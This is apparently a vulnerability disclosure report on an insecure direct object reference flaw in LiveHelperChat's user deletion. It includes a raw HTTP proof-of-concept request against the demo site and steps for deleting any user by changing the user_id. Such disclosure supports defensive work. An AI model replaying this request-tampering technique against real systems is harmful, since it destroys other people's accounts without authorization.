Description

LiveHelperChat is vulnerable to Insecure Direct Object Reference / IDOR vulnerability. The system’s authorization functionality does not prevent one user from deleting another user by modifying the user_id identifying the user.

Each user has a user_id (1,2,3,…). A malicious authorized user can delete any other user by changing the value of user_id in the GET request of deleting user.

Proof of Concept

HTTP request

GET /site_admin/user/delete/3/(csfr)/6252584dffdb5fd120f461a3f36d3bf5 HTTP/1.1
Host: demo.livehelperchat.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.livehelperchat.com/site_admin/user/userlist
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=n7c0ok7vbicornv5g10fc38ein

Step to reproduce

1.Go to the user list (https://demo.livehelperchat.com/site_admin/user/userlist)
2.Click on the delete button of any user (for example: the user with user_id=3)
3.Intercept the request, now it looks like /site_admin/user/delete/3/(csfr)/<csrf_value>
4.Then change the value of user_id in the request from 3 to another (1,2,4,…) whether that user_id exists in the user list.
5.Forward the requests, now the user with new user_id will be deleted.

Impact

This vulnerability is capable of deleting any user in the user list.